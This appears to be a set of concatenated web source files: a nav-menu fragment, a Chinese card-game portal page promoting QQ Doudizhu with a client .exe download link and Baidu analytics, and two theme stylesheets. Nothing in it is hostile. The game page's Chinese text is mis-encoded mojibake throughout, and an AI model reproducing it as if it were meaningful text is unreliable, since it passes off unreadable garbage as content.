<li><div><a href="http://lists.limb-project.com/mailman/listinfo">Mailing lists</a></div></li>
</ul>
</div>
</li>
<li class="current"><a href="http://limb-project.com/en/development" onmouseover="menu.showMenu('menu3');">Development</a>
<div style="display: none;" class="dropdownmenu" id="menu3">
<ul>
<li><div><a href="http://limb-project.com/en/svn">Subversion</a></div></li>
<li><div><a href="http://jira.limb-project.com">Tickets</a></div></li>
</ul>
</div>
</li>
<li><a href="http://limb-project.com/en/documentation" onmouseover="menu.showMenu('menu4');">Documentation</a>
<div style="display: none;" class="dropdownmenu" id="menu4">
<ul>
<li><div><a href="http://wiki.limb-project.com">Wiki</a></div></li>
<li><div><a href="http://api.limb-project.com">API</a></div></li>
</ul>
</div>
<li><a href="http://limb-project.com/en/download" onmouseover="menu.showMenu('menu5');">Download</a>
<div style="display: none;" class="dropdownmenu" id="menu5">
<ul>
<li><div><a href="http://sourceforge.net/project/showfiles.php?group_id=109345">SourceForge</a></div></li>
<li><div><a href="http://snaps.limb-project.com">Nightly builds</a></div></li>
</ul>
</div>
</li>
<li><a href="http://bits.limb-project.com" onmouseover="menu.showMenu('menu6');">Code Bits</a></li>
-->
</ul>
</div>
</div>
</div>
|
wulu/2015.11.23/qipai/doudizhu/371.html | bylu/Test | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>qq»¶ÀÖ¶·µØÖ÷</title>
<meta name="keywords" content="»¶ÀÖ,¶·µØÖ÷,»¶ÀÖ,¶·µØÖ÷,ÌÚѶ,Ò»¿î,СÓÎÏ·,ÓÎÏ·,¼òµ¥," />
<meta name="description" content="qq»¶ÀÖ¶·µØÖ÷ ÊÇÌÚѶµÄÒ»¿îСÓÎÏ·£¬ÓÎÏ·ÒÔ¼òµ¥¡¢ºÃÍæ¶øÉîÈëÈËÐÄ¡£ Ëæ×ÅÊÖ»ú¹¦ÄܵIJ»¶ÏÔöÇ¿£¬Ô½À´Ô½¶àµÄÓéÀÖÆ½Ì¨×ªÏòÁËÒÆ¶¯»¥ÁªÍø¡£±ÈÆðµçÄÔ£¬ÊÖ»úÓÐ×ÅÐíÐí¶à¶àµÄÓÅÊÆ£¬ÆäÖÐ×î´óµÄÓÅÊÆ¾ÍÊDZã½ÝÐÔ¡£ÊÖ»ú¿ÉÒÔËæÉíЯ´ø£¬Ê®·Ö·½±ã£¬²»ÂÛÄãÔڵȹ«½»Ê±£¬»¹ÊÇÅŶÓʱ" />
<LINK rel=stylesheet type=text/css href="/qipai/templets/default/style/style.css">
<LINK rel=stylesheet type=text/css href="/qipai/templets/default/style/p.css">
<link rel=stylesheet type=text/css href="/qipai/templets/default/style/common.css">
<script tyep="text/javascript" src="/qipai/templets/default/js/jquery-1.8.3.min.js"></script>
<BODY>
<DIV class=top>
<DIV class=c_960>
<DIV class=top-nav><SPAN>Hi£¬»¶ÓÀ´µ½789ÓÎÏ·ÖÐÐÄ£¡</SPAN></DIV>
<DIV><!-- logo -->
<DIV style="POSITION: relative" class=logo><A
href="http://www.789game.com"></A></DIV>
<DIV class=nav>
<UL>
<LI><a href="http://www.789game.com/" target="_blank">ÍøÕ¾Ê×Ò³</a></LI>
<li><a href='/qipai/qipaiyouxipingtai/' target="_blank" >ÆåÅÆÓÎϷƽ̨</a></li>
<li><a href='/qipai/doudizhu/' target="_blank" >¶·µØÖ÷¼¼ÇÉ</a></li>
<li><a href='/qipai/xiangqi/' target="_blank" >ÏóÆå¼¼ÇÉ</a></li>
<li><a href='/qipai/buyu/' target="_blank" >²¶ÓãÓÎÏ·</a></li>
<li><a href='/qipai/douniujiqiao/' target="_blank" >¶·Å£¼¼ÇÉ</a></li>
<li><a href='/qipai/majiangjiqiao/' target="_blank" >Â齫¼¼ÇÉ</a></li>
</UL></DIV><!-- µ¼º½À¸½áÊø --></DIV></DIV></DIV>
<div style="BORDER: #cdcdcd 1px solid; margin-top:10px; width:960px; margin:5px auto">
<div id="lunbobg">
<ul>
<li><a href="http://www.789game.com/NewsShow.aspx?XID=439"> <img src="/qipai/templets/default/images/1-1.jpg" width="960" height="424"></a></a></li>
<li><a href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe"> <img src="/qipai/templets/default/images/2-1.jpg" width="960" height="424"></a></a></li>
<li><a href="http://www.789game.com/NewsShow.aspx?XID=2006"> <img src="/qipai/templets/default/images/3-1.jpg" width="960" height="424"></a></a></li>
</ul>
</div>
</div>
<div class="main">
<DIV id=p_con><!--Ò³Ãæ×ó²à²¿·Ö ¿ªÊ¼ -->
<DIV class=p_l>
<DIV class=location><IMG src="/qipai/templets/default/images/flag.png" width=16 height=16>
µ±Ç°Î»ÖÃ:</strong><a href='/qipai'>ÆåÅÆÓÎÏ·</a> > <a href='/qipai/doudizhu/'>¶·µØÖ÷¼¼ÇÉ</a> > </DIV>
<DIV id=pnlContent>
<H1 class=que-title>qq»¶ÀÖ¶·µØÖ÷</H1>
<DIV class=que-content>
<div>
<strong>qq»¶ÀÖ¶·µØÖ÷</strong>ÊÇÌÚѶµÄÒ»¿îСÓÎÏ·£¬ÓÎÏ·ÒÔ¼òµ¥¡¢ºÃÍæ¶øÉîÈëÈËÐÄ¡£</div>
<div>
</div>
<div>
Ëæ×ÅÊÖ»ú¹¦ÄܵIJ»¶ÏÔöÇ¿£¬Ô½À´Ô½¶àµÄÓéÀÖÆ½Ì¨×ªÏòÁËÒÆ¶¯»¥ÁªÍø¡£±ÈÆðµçÄÔ£¬ÊÖ»úÓÐ×ÅÐíÐí¶à¶àµÄÓÅÊÆ£¬ÆäÖÐ×î´óµÄÓÅÊÆ¾ÍÊDZã½ÝÐÔ¡£ÊÖ»ú¿ÉÒÔËæÉíЯ´ø£¬Ê®·Ö·½±ã£¬²»ÂÛÄãÔڵȹ«½»Ê±£¬»¹ÊÇÅŶÓʱ£¬»òÕßÔÚ»§ÍâÎÞÁÄʱ£¬ÊÖ»ú¶¼¿ÉÒÔËæÊ±³ÉΪÄãµÄÓéÀÖ¹¤¾ß¡£¶øÄ¿Ç°ÊÖ»úÉÏÍæµÄÓÎÏ·×î¶àµÄ¾ÍÊÇÊÖ»úqq»¶ÀÖ¶·µØÖ÷¡£°Ñ¼ÒÓ÷»§Ïþ£¬ÈËÈ˶¼Ï²»¶µÄ¶·µØÖ÷ÓÎÏ·ÒÆÖ²µ½ÁËÊÖ»úÉÏ¡£ÊÖ»úqq»¶ÀÖ¶·µØÖ÷ÓµÓÐÊ®·Ö¾«ÃÀµÄ½çÃæ£¬²¢ÇÒÔÚ¹¦ÄÜÉÏÓëµçÄ԰漸ºõûÓÐÇø±ð£¬²»ÂÛÊÇÔöú¶¯ÌýµÄ±³¾°ÒôÀÖ»¹ÊdzöÅÆÊ±µÄ´Ì¼¤ÒôЧ£¬¶¼¿ÉÒÔÔÚÊÖ»úÉϱíÏÖµÄÁÜÀ쾡Ö¡£³ý´ËÖ®Í⣬ÊÖ»úqq»¶ÀÖ¶·µØÖ÷ÔÚÊý¾ÝÉÏÒ²ÓëµçÄÔ°æÍêȫͬ²½£¬´ó¼Ò²»±Øµ£ÐÄÊÖ»úÉÏÓ®µÃ»¶ÀÖ¶¹ÎÞ·¨ÔÚµçÄÔÉÏʹÓá£ÔõôÑù£¬ÊDz»ÊǾõµÃºÜ²»´íÄØ£¿</div>
</DIV>
<DIV class=pre-nex>ÉÏһƪ£º<a href='/qipai/doudizhu/370.html'>4399»¶ÀÖ¶·µØÖ÷</a> ÏÂÒ»Ìõ£ºÏÂһƪ£º<a href='/qipai/doudizhu/372.html'>ÁªÖÚ¶·µØÖ÷</a> </DIV></DIV>
</DIV>
<DIV class=p_r_xiazai><DIV class=r_ad>
<DIV class=dl_client_v2>
<A style="BACKGROUND-POSITION: 22px -536px" class=client_dl title=ÏÂÔØ¿Í»§¶Ë
rel=nofollow href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe" ></A></DIV></DIV></div>
<DIV class=p_r>
<DL class=box_dl>
<DT>ÍÆ¼öÎÄÕÂ</DT>
<DD><a href="/qipai/doudizhu/180.html">ÊÖ»ú¶·µØÖ÷ÏÂÔØ</a> </DD>
<DD><a href="/qipai/doudizhu/176.html">ÊÖ»úQQ¶·µØÖ÷</a> </DD>
<DD><a href="/qipai/doudizhu/36.html">ËÄÈ˶·µØÖ÷ÔõÃ´Íæ£¬ËÄÈ˶·µØÖ÷¾</a> </DD>
<DD><a href="/qipai/doudizhu/35.html">΢ÐÅ»¶ÀÖ¶·µØÖ÷³äÖµºÍÏÂÔØ</a> </DD>
</DL>
<DL class=box_dl>
<DT>×îÈÈÎÄÕÂ</DT>
<DD><a href="/qipai/doudizhu/1025.html">¶à¶àÊÓÆµ¶·µØÖ÷¿ªÆôȫеÄÊÓÆµÓÎ</a> </DD>
<DD><a href="/qipai/doudizhu/193.html">jj¶·µØÖ÷ÏÂÔØ</a> </DD>
<DD><a href="/qipai/doudizhu/359.html">ÊÓÆµ¶·µØÖ÷Ãâ·ÑÏÂÔØ</a> </DD>
<DD><a href="/qipai/doudizhu/517.html">ÏÂÔØÊÓÆµ¶·µØÖ÷</a> </DD>
<DD><a href="/qipai/doudizhu/986.html">ÎÞÁľÍÍæÃæ¶ÔÃæÊÓÆµ¶·µØÖ÷</a> </DD>
<DD><a href="/qipai/doudizhu/690.html">qq¶·µØÖ÷µÈ¼¶</a> </DD>
<DD><a href="/qipai/doudizhu/156.html">¶·µØÖ÷µ¥»ú°æÏÂÔØ</a> </DD>
<DD><a href="/qipai/doudizhu/175.html">ÊÓÆµ¶·µØÖ÷ÏÂÔØ°²×°</a> </DD>
<DD><a href="/qipai/doudizhu/190.html">jj¶·µØÖ÷¹ÙÍø</a> </DD>
<DD><a href="/qipai/doudizhu/453.html">΢ÐÅ»¶ÀÖ¶·µØÖ÷</a> </DD>
</DL><DIV class=tags>
<DL class=box_dl>
<DT>ÓÎÏ·½éÉÜ</DT>
<DIV class=tags>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=203" target="_blnak">ˮ䰴«</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=2040" target="_blank">нð󸲶Óã</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=6" target="_blank">789Ó®ÈýÕÅ</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=361" target="_blank">¶þÈËÂ齫</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=102" target="_blank">¶þÈ˶·Å£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=27" target="_blank">ËÄÈ˶·Å£</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=200" target="_blank">¶·µØÖ÷</A>
<A href="http://www.789game.com/GameRulesShow.aspx?XID=2010" target="_blank">ÀîåÓÅüÓã</A>
</DIV></DL></DIV>
</DIV>
</DIV><!--Ò³ÃæÓҲಿ·Ö ½áÊø --></DIV>
</DIV>
<DIV class=footer>
µÖÖÆ²»Á¼ÓÎÏ· ¾Ü¾øµÁ°æÓÎÏ· ×¢Òâ×ÔÎÒ±£»¤ ½÷·ÀÊÜÆÉϵ± ÊʶÈÓÎÏ·ÒæÄÔ ³ÁÃÔÓÎÏ·ÉËÉí ºÏÀí°²ÅÅʱ¼ä ÏíÊܽ¡¿µÉú»î <BR>
789ÓÎÏ·ÖÐÐÄ Ô¥ICP±¸12014032ºÅ-1
±¸°¸ÎĺÅ:ÎÄÍøÓα¸×Ö[2011]C-CBG002ºÅ<BR>¿Í·þQQ£º4000371814 ¿Í·þÈÈÏߣº4000371814 <script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fde6684532de22a1b45cd44b14141ff07' type='text/javascript'%3E%3C/script%3E"));
</script>
</DIV><style>
#banners {margin-top:-50px;}
#banners .hd {margin-top:-15px;width:100%;float:left;}
#banners .hd ul {width: 555px;z-index: 100; position: absolute; left: 45%; }
#banners .hd ul li {float: left; width: 11px; height: 11px; background-color: #fff; overflow: hidden; text-indent: -9999px; border-radius:6px;cursor:pointer; opacity: 0.5;filter: alpha(opacity=50); cursor: pointer;}
#banners .hd ul li.on {opacity: 1;filter: alpha(opacity=100);}
</style>
<div style="position:absolute;width:200px;top:340px;">
<div id="ad_right" style="position:fixed;width:142px;height:327px;z-index:8886;">
<a style="float:right;position:absolute;left:145px;margin-left:-20px;width:17px;height:17px;background:url(/qipai/templets/default/images/close1.png) no-repeat;z-index:8888;" id="closeleftbar" href="javascript:void(0);"></a>
<div class="leftLoops leftLoop1" style="z-index:8887" id="banners">
<div class="bd bd3">
<ul class="picLists">
<li>
<a href="http://www.789game.com/NewsShow.aspx?XID=439" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;">
<img src="/qipai/templets/default/images/001leftQP.jpg" width="142" height="327" alt="" title="" /></a>
</a>
</li>
<li>
<a href="http://www.789game.com/NewsShow.aspx?XID=2006" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;">
<img src="/qipai/templets/default/images/sh.jpg" width="142" height="327" alt="" title="" /></a>
</a>
</li>
</ul>
</div>
<div class="hd">
<ul></ul>
</div>
</div>
</div>
<script type="text/javascript" src="/qipai/templets/default/js/jquery.SuperSlide.js"></script>
<script type="text/javascript">
$(document).ready(function () {
$("#closeleftbar").click(function(){
$("#ad_right").css("display","none");
});
});
jQuery("#banners").slide({titCell:".hd ul",mainCell:".bd3 ul",effect:"leftLoop",autoPlay:true,autoPage:true,vis:1,scroll:1,trigger:"click",interTime:3000});</script>
<script type="text/javascript">
$(document).ready(function () {
$("#closeleftbar").click(function(){
$("#ad_right").css("display","none");
});
});
jQuery("#banners").slide({titCell:".hd ul",mainCell:".bd3 ul",effect:"leftLoop",autoPlay:true,autoPage:true,vis:1,scroll:1,trigger:"click",interTime:3000});</script>
<script type="text/javascript">
$(function() {
var sWidth = $("#lunbobg").width(); //»ñÈ¡½¹µãͼµÄ¿í¶È£¨ÏÔÊ¾Ãæ»ý£©
var len = $("#lunbobg ul li").length; //»ñÈ¡½¹µãͼ¸öÊý
var index = 0;
var picTimer;
//ÒÔÏ´úÂëÌí¼ÓÊý×Ö°´Å¥ºÍ°´Å¥ºóµÄ°ë͸Ã÷Ìõ£¬»¹ÓÐÉÏÒ»Ò³¡¢ÏÂÒ»Ò³Á½¸ö°´Å¥
var btn = "<div class='btnBg'></div><div class='btn'>";
for(var i=0; i < len; i++) {
btn += "<span></span>";
}
btn += "</div><div class='preNext pre'></div><div class='preNext next'></div>";
$("#lunbobg").append(btn);
$("#lunbobg .btnBg").css("opacity",0);
//ΪС°´Å¥Ìí¼ÓÊó±ê»¬Èëʼþ£¬ÒÔÏÔʾÏàÓ¦µÄÄÚÈÝ
$("#lunbobg .btn span").css("opacity",0.4).mouseover(function() {
index = $("#lunbobg .btn span").index(this);
showPics(index);
}).eq(0).trigger("mouseover");
//ÉÏÒ»Ò³¡¢ÏÂÒ»Ò³°´Å¥Í¸Ã÷¶È´¦Àí
$("#lunbobg .preNext").css("opacity",0.08).hover(function() {
$(this).stop(true,false).animate({"opacity":"0.5"},300);
},function() {
$(this).stop(true,false).animate({"opacity":"0.08"},300);
});
//ÉÏÒ»Ò³°´Å¥
$("#lunbobg .pre").click(function() {
index -= 1;
if(index == -1) {index = len - 1;}
showPics(index);
});
//ÏÂÒ»Ò³°´Å¥
$("#lunbobg .next").click(function() {
index += 1;
if(index == len) {index = 0;}
showPics(index);
});
//±¾ÀýΪ×óÓÒ¹ö¶¯£¬¼´ËùÓÐliÔªËØ¶¼ÊÇÔÚͬһÅÅÏò×󸡶¯£¬ËùÒÔÕâÀïÐèÒª¼ÆËã³öÍâΧulÔªËØµÄ¿í¶È
$("#lunbobg ul").css("width",sWidth * (len));
//Êó±ê»¬ÉϽ¹µãͼʱֹͣ×Ô¶¯²¥·Å£¬»¬³öʱ¿ªÊ¼×Ô¶¯²¥·Å
$("#lunbobg").hover(function() {
clearInterval(picTimer);
},function() {
picTimer = setInterval(function() {
showPics(index);
index++;
if(index == len) {index = 0;}
},3000); //´Ë4000´ú±í×Ô¶¯²¥·ÅµÄ¼ä¸ô£¬µ¥Î»£ººÁÃë
}).trigger("mouseleave");
//ÏÔʾͼƬº¯Êý£¬¸ù¾Ý½ÓÊÕµÄindexÖµÏÔʾÏàÓ¦µÄÄÚÈÝ
function showPics(index) { //ÆÕͨÇл»
var nowLeft = -index*sWidth; //¸ù¾ÝindexÖµ¼ÆËãulÔªËØµÄleftÖµ
$("#lunbobg ul").stop(true,false).animate({"left":nowLeft},300); //ͨ¹ýanimate()µ÷ÕûulÔªËØ¹ö¶¯µ½¼ÆËã³öµÄposition
$("#lunbobg .btn span").stop(true,false).animate({"opacity":"0.2"},300).eq(index).stop(true,false).animate({"opacity":"1"},300); //Ϊµ±Ç°µÄ°´Å¥Çл»µ½Ñ¡ÖеÄЧ¹û
}
});
</script>
</BODY></HTML>
|
assets/css/meta-box-rtl.css | themeblvd/greenlight | /**
* Meta Box Styles (RTL)
*
* @package Greenlight
* @since 1.0.0
*/
/* General */
.greenlight-hide {
display: none;
}
/* Custom Meta Box */
.greenlight-meta-box {
margin: -6px -12px 0 -12px;
}
.greenlight-meta-box label.title {
display: block;
font-weight: 600;
margin: 0 0 .5em 0;
padding: 0 .2em;
vertical-align: baseline;
}
.greenlight-meta-box .setting {
border-bottom: 1px solid #eee;
padding: 30px 20px;
}
.greenlight-meta-box .setting:last-child {
border: none;
}
.greenlight-meta-box .setting.type-select select,
.greenlight-meta-box .setting.type-text input {
min-width: 160px;
}
.greenlight-meta-box .description {
margin-top: 12px;
}
@media (min-width: 1150px) {
.greenlight-meta-box.side .setting {
padding: 20px;
}
.greenlight-meta-box.normal .setting {
padding-left: 30px 20px 30px 40px;
}
.greenlight-meta-box.normal .setting:before,
.greenlight-meta-box.normal .setting:after {
content: " ";
display: table;
}
.greenlight-meta-box.normal .setting:after {
clear: both;
}
.greenlight-meta-box .setting.type-select select,
.greenlight-meta-box .setting.type-text input {
min-width: 90%;
}
.greenlight-meta-box.normal .control {
float: right;
width: 60%;
}
.greenlight-meta-box.normal .setting.type-checkbox .control {
float: none;
width: auto;
}
.greenlight-meta-box.normal .description {
float: left;
margin-top: 0;
width: 40%;
}
}
/* Radio Images */
.greenlight-radio-images input {
display: none;
}
.greenlight-radio-images label {
display: inline-block;
}
.greenlight-radio-images img {
border: 4px solid transparent;
box-sizing: border-box;
height: auto;
max-width: 100%;
padding: 1px;
width: 60px;
}
.greenlight-meta-box.side .greenlight-radio-images img {
width: 78px;
}
.greenlight-radio-images img:hover,
.greenlight-radio-images img:focus {
border-color: #ddd;
}
.greenlight-radio-images .active img {
border-color: #adadad;
}
|
sites/all/themes/responsive_bartik/css/style.css | ichionid/nbainfo_backup | #content div.view-blogs .view-mode-blog_small_teaser,
div.view-forum-topics .forum-comment {
padding-left: 4%;
padding-right: 4%;
}
.forum-post-content .field-label {
width: 40%;
}
body .comment-form .form-item {
overflow:visible;
}
body.node-type-forum h1#page-title {
display:none;
}
#main-wrapper .pane-blogs .pane-title {
background-color: #966305;
color: white;
}
ul#superfish-1 {
width: 100%;
background: black;
text-align: center;
padding-bottom: 1px;
}
ul#superfish-1 li#menu-468-1 {
display: inline-block;
}
#highlighted ul.menu li {
margin: 0;
}
#logo {
background: black;
}
#content .section {
padding: 0;
}
#content .section .contextual-links-region .inside {
padding: 0 15px;
}
#header #block-search-form {
float: right;
}
/*.pane-content #shoutbox-body .form-wrapper {
margin-top: 0px;
margin-bottom: 1em;
}*/
.panels-flexible-region-2-chat h2.pane-title,
.panels-flexible-region-2-twitter h2.pane-title {
background-color: #966305;
color: white;
}
.node-dagens-video h2 {
display: none;
}
#block-search-form {
height: 2.2em;
}
.pane-blogs .pane-title a {
color: #fff;
}
.pane-blogs .views-row .group-right h2 a {
color: #000;
}
.pane-blogs .views-row .group-right a.username {
color:#966305
}
.panels-flexible-region-2-debate_region-inside .pane-blogs .views-row {
border-color: #966305;
border-style: solid;
border-width: 0.1em;
}
.view-forum-topics .views-row {
border-color: silver;
border-style: solid;
border-width: 0.1em;
}
/*.debate-region {
border-right-color: black;
border-right-style: solid;
border-right-width: 0.6em;
}*/
.pane-blogs .pane-title,
.pane-forum-topics .pane-title {
text-align: center;
}
.pane-blogs .pane-title {
background-color: #966305;
color: #ffffff;
}
.pane-forum-topics .pane-title {
background-color: gray;
color: #ffffff;
}
/******************Forum frontpage comments************************/
.forum-comment .forum-left-side {
float: left;
width: 30%;
min-width: 100px;
}
.pane-content .ds-2col > .group-right {
width: 65%;
padding-left: 2%;
}
.group-right .field-name-field-tags {
margin-bottom: 0;
}
.pane-content .view-mode-blog_small_teaser .group-left {
width: 33%;
padding-top: 2em;
}
.view-mode-blog_small_teaser {
overflow: hidden;
}
.forum-comment .forum-right-side {
float: right;
width: 60%;
min-width: 100px;
}
.forum-comment ,
.view-mode-blog_small_teaser {
height: 14em;
}
.forum-comment-header-wrapper {
height: 2em;
}
.forum-comment-header-wrapper .forum-subject-title {
float: left;
}
.forum-comment-header-wrapper .forum-comment-date {
float: right;
}
n#block-menu-menu-nbainfo-menu .content {
width: auto;
height: auto;
margin: 0;
padding: 0;
}
#block-menu-menu-nbainfo-menu ul.menu {
list-style: none;
margin: 0;
padding: 0.4em 0 0.4em 0;
}
#block-menu-menu-nbainfo-menu ul.menu li {
float: none;
margin: 0;
padding: 0;
padding-left: 0.2em;
}
#block-menu-menu-nbainfo-menu ul.menu li ~li{
border-left-width: 2px;
border-left-style: solid;
border-left-color: #fff;
}
#block-menu-menu-nbainfo-menu ul li a {
display: block;
height: auto;
float: left;
text-transform: uppercase;
}
/********************** Image in front page*******************/
#content .field-name-field-youtube-video iframe,
div.dagens-billet-wrapper img {
width: 100%!important;
}
/* ------------------- Overall Specifications ------------- */
#header #logo img {
width: 100%;
}
body {
width: 90%;
min-width: 960px;
margin-left: auto!important;
margin-right: auto!important;
line-height: 1.5;
font-size: 87.5%;
word-wrap: break-word;
margin: 0;
padding: 0;
border: 0;
outline: 0;
}
a:link,
a:visited {
text-decoration: none;
}
a:hover,
a:active,
a:focus {
text-decoration: underline;
}
h1,
h2,
h3,
h4,
h5,
h6 {
margin: 1.0em 0 0.5em;
font-weight: inherit;
}
h1 {
font-size: 1.357em;
color: #000;
}
h2 {
font-size: 1.143em;
}
p {
margin: 0 0 1.2em;
}
del {
text-decoration: line-through;
}
tr.odd {
background-color: #dddddd;
}
img {
outline: 0;
}
/**
* The generic monospace font family is listed before Courier new to avoid a
* a bug in font-size rendering:
* http://meyerweb.com/eric/thoughts/2010/02/12/fixed-monospace-sizing
*/
code,
pre,
kbd,
samp,
var {
padding: 0 0.4em;
font-size: 0.77em;
font-family: Menlo, Consolas, "Andale Mono", "Lucida Console", "Nimbus Mono L", "DejaVu Sans Mono", monospace, "Courier New";
}
code {
background-color: #f2f2f2;
background-color: rgba(40, 40, 0, 0.06);
}
pre code,
pre kbd,
pre samp,
pre var,
kbd kbd,
kbd samp,
code var {
font-size: 100%;
background-color: transparent;
}
pre code,
pre samp,
pre var {
padding: 0;
}
.description code {
font-size: 1em;
}
kbd {
background-color: #f2f2f2;
border: 1px outset #575757;
margin: 0 3px;
color: #666;
display: inline-block;
padding: 0 6px;
border-radius: 5px;
}
pre {
background-color: #f2f2f2;
background-color: rgba(40, 40, 0, 0.06);
margin: 10px 0;
overflow: hidden;
padding: 15px;
white-space: pre-wrap;
}
/* ------------------- Fonts ------------------------------ */
body,
#site-slogan,
.ui-widget,
.comment-form label {
font-family: Georgia, "Times New Roman", Times, serif;
}
#header,
#footer-wrapper,
#skip-link,
ul.contextual-links,
ul.links,
ul.primary,
.item-list .pager,
div.field-type-taxonomy-term-reference,
div.messages,
div.meta,
p.comment-time,
table,
.breadcrumb {
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
input,
textarea,
select,
a.button {
font-family: "Lucida Grande", "Lucida Sans Unicode", Verdana, sans-serif;
}
/* ------------------- Reset Styles ----------------------- */
caption {
text-align: left; /* LTR */
font-weight: normal;
}
blockquote {
background: #f7f7f7;
border-left: 1px solid #bbb;
font-style: italic;
margin: 1.5em 10px;
padding: 0.5em 10px;
}
blockquote:before {
color: #bbb;
content: "\201C";
font-size: 3em;
line-height: 0.1em;
margin-right: 0.2em;
vertical-align: -.4em;
}
blockquote:after {
color: #bbb;
content: "\201D";
font-size: 3em;
line-height: 0.1em;
vertical-align: -.45em;
}
blockquote > p:first-child {
display: inline;
}
a.feed-icon {
display: inline-block;
padding: 15px 0 0 0;
}
.ds-2col.node.node-blog.node-promoted.contextual-links-region.view-mode-blog_small_teaser .group-left img {
width: 100%;
}
.node-blog.node-promoted.node-full.view-mode-full .group-middle img {
max-width: 10000px;
max-height: 10000px;
}
.foto-credit .field-item,
.foto-credit {
font-weight: bold;
font-size: 12px;
text-align: right;
}
.billedtekst {
font-style:italic;
text-align: right;
}
img {
max-width: 100%;
max-height: 350px;
border: 0;
}
.node-type-blog img {
max-width: none;
max-height: none;
border: 0;
}
.node-type-blog .field-type-image img {
margin: 0;
}
/* ------------------- Table Styles ----------------------- */
table {
border: 0;
border-spacing: 0;
font-size: 0.857em;
margin: 10px 0;
width: 100%;
}
table table {
font-size: 1em;
}
#footer-wrapper table {
font-size: 1em;
}
table tr th {
background: #757575;
background: rgba(0, 0, 0, 0.51);
border-bottom-style: none;
}
table tr th,
table tr th a,
table tr th a:hover {
color: #fff;
font-weight: bold;
}
table tbody tr th {
vertical-align: top;
}
tr td,
tr th {
padding: 4px 9px;
border: 1px solid #fff;
text-align: left; /* LTR */
}
#footer-wrapper tr td,
#footer-wrapper tr th {
border-color: #555;
border-color: rgba(255, 255, 255, 0.18);
}
tr.odd {
background: #e4e4e4;
background: rgba(0, 0, 0, 0.105);
}
tr,
tr.even {
background: #efefef;
background: rgba(0, 0, 0, 0.063);
}
table ul.links {
margin: 0;
padding: 0;
font-size: 1em;
}
table ul.links li {
padding: 0 1em 0 0;
}
/* ------------------- List Styles ------------------------ */
.block ol,
.block ul {
margin: 0;
padding: 0 0 0.25em 1em; /* LTR */
}
.contextual-region .contextual .contextual-links a {
font-size: 0.923em;
text-shadow: 0 0 0 !important;
}
.item-list .pager {
font-size: 0.929em;
}
.item-list .pager li {
padding: 0;
}
.item-list .pager a {
display: inline-block;
padding: 10px 15px;
}
.item-list .pager .pager-first a {
padding: 10px 10px 10px 0;
}
.item-list .pager .pager-previous a {
padding: 10px 0;
}
.item-list .pager .pager-current {
padding: 0 10px;
}
.item-list .pager .pager-next a,
.item-list .pager .pager-last a {
padding: 10px 0 10px 10px;
}
ul.menu li {
margin: 12px 0;
}
ul.menu li a {
padding: 10px 0;
}
.region-content ul,
.region-content ol {
margin: 1em 0;
padding: 0 0 0.25em 15px; /* LTR */
}
.item-list ul li {
margin: 0;
padding: 0.2em 0.5em 0 0; /* LTR */
}
ul.tips {
padding: 0 0 0 1.25em; /* LTR */
}
/* ------------------- Header ----------------------------- */
#skip-link {
left: 50%;
margin-left: -5.25em;
margin-top: 0;
position: absolute;
width: auto;
z-index: 50;
}
#skip-link a,
#skip-link a:link,
#skip-link a:visited {
background: #444;
background: rgba(0, 0, 0, 0.6);
color: #fff;
display: block;
font-size: 0.94em;
line-height: 1.7;
padding: 1px 10px 2px 10px;
text-decoration: none;
border-radius: 0 0 10px 10px;
}
#skip-link a:hover,
#skip-link a:active,
#skip-link a:focus {
outline: 0;
}
#logo {
float: left; /* LTR */
/*padding-left: 5px; *//* LTR */
}
#name-and-slogan {
float: left; /* LTR */
margin: 0;
padding: 5px 10px 8px;
}
#site-name {
font-size: 1.6em;
color: #686868;
line-height: 1;
}
h1#site-name {
margin: 0;
}
#site-name a {
font-weight: normal;
}
#site-slogan {
font-size: 0.929em;
margin-top: 7px;
word-spacing: 0.1em;
font-style: italic;
}
/* Region header blocks. */
.region-header .block {
font-size: 0.857em;
float: left; /* LTR */
margin: 0 10px;
padding: 0;
}
.region-header .block .content {
margin: 0;
padding: 0;
}
.region-header .block ul {
margin: 0;
padding: 0;
}
.region-header .block li {
list-style: none;
list-style-image: none;
padding: 0;
}
.region-header .form-text {
background: #fefefe;
background: rgba(255, 255, 255, 0.7);
border-color: #ccc;
margin-right: 2px; /* LTR */
width: 120px;
}
.region-header .form-text:hover,
.region-header .form-text:focus,
.region-header .form-text:active {
background: #fff;
background: rgba(255, 255, 255, 0.8);
}
.region-header .form-required {
color: #eee;
color: rgba(255, 255, 255, 0.7);
}
/* Region header block menus. */
.region-header .block-menu {
border: 1px solid;
border-color: #eee;
border-color: rgba(255, 255, 255, 0.2);
padding: 0;
width: 208px;
}
.region-header .block-menu li a {
display: block;
border-bottom: 1px solid;
border-bottom-color: #eee;
border-bottom-color: rgba(255, 255, 255, 0.2);
padding: 3px 7px;
}
.region-header .block-menu li a:hover,
.region-header .block-menu li a:focus,
.region-header .block-menu li a:active {
text-decoration: none;
background: rgba(255, 255, 255, 0.15);
}
.region-header .block-menu li.last a {
border-bottom: 0;
}
/* User Login block in the header region */
.region-header #block-user-login {
width: auto;
}
.region-header #block-user-login .content {
margin-top: 2px;
}
.region-header #block-user-login .form-item {
float: left; /* LTR */
margin: 0;
padding: 0;
}
.region-header #block-user-login div.item-list,
.region-header #block-user-login div.description {
font-size: 0.916em;
margin: 0;
}
.region-header #block-user-login div.item-list {
clear: both;
}
.region-header #block-user-login div.description {
display: inline;
}
.region-header #block-user-login .item-list ul {
padding: 0;
line-height: 1;
}
.region-header #block-user-login .item-list li {
list-style: none;
float: left; /* LTR */
padding: 3px 0 1px;
}
